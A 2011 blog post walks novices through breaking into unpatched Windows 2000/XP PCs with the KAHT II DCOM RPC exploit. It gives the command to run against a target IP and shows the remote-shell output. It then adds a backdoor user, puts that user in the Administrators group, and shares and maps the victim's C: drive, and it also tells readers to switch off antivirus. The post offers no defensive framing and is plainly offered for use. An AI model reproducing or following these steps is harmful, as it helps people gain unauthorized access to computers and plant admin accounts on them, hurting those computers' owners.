Saturday, 18 June 2011

Hacking a PC with a exploit

What is a exploit? It's a poorly coded piece in software which you can use to gain access to the system. There is many exploits available for the various MS Windows's out there. Check this page for new exploits : http://www.frsirt.com/exploits/ or check the Windows Hacker exploit download page which has compiled exploits.

Now if your a n00b, you don't know how to compile an exploit, basically you need some programming experience, so go learn how to program. Most exploits are written in C++ so try Bloodshed Dev C++ which you can use to compile exploits.

Read this tutorial about compiling exploits.

But you can download exploits which other people has already compiled. If someone updates their PC when new exploits comes out, you can't exploit them. but if they don't update and install new patches, the chance you can exploit and gain access to their PC is big.

Check this example of how a exploit works:

KAHT II - MASSIVE RPC EXPLOIT

This is a exploit for Win2k/XP and its already compiled, you can download it from the Windows Hacker exploits section.

This is an explanation of how to use it :

1. Get target IP, make sure it uses XP or 2k

2. Download exploit tool
(make sure to deactivate your AV)

3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101

note: 192.168.1.101 is the target
192.168.1.100 <-- 100 here is target - 1

4. If success, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------

Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...

Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

5. NOW.. YOU ARE IN TARGET DRIVE

6. Then you may add user
C:\WINNT\system32>net user myuser mypassword /add
^ ^
user name password

7. Group to admin
C:\WINNT\system32>net localgroup Administrators myuser /add
^ ^ ^
target group group user

8. Sharing drive
C:\WINNT\system32>net share c=c:

9. Exit from target.. dont forget!
C:\WINNT\system32>exit

10. Use share drive, run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here

There you will now have a mapped drive to the target PC and an administrator account.

0 comments:

Post a comment